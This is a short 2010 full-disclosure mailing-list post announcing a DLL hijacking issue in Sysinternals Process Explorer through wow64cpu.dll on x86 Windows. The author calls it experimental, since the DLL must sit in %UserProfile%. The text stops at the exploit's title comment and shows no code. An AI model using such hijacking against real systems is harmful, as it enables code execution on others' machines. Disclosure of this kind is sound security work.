Date: Fri, 17 Sep 2010 23:44:44 +0200
From: miom <miom@....net>
To: full-disclosure@...ts.grok.org.uk
Subject: Sysinternals Process Explorer DLL Hijacking on
 x86 Windows systems (wow64cpu.dll)

I sent this one a while ago to offsec but it wasn't added.
It's rather an experimental attack vector and not a real threat since the dll has to be placed inside the %UserProfile% directory.
It might work on Windows7 and Vista 32 bit too, but I didn't test it.

/*
  * Exploit Title:   Sysinternals Process Explorer DLL Hijacking on x86 Windows systems (wow64cpu.dll)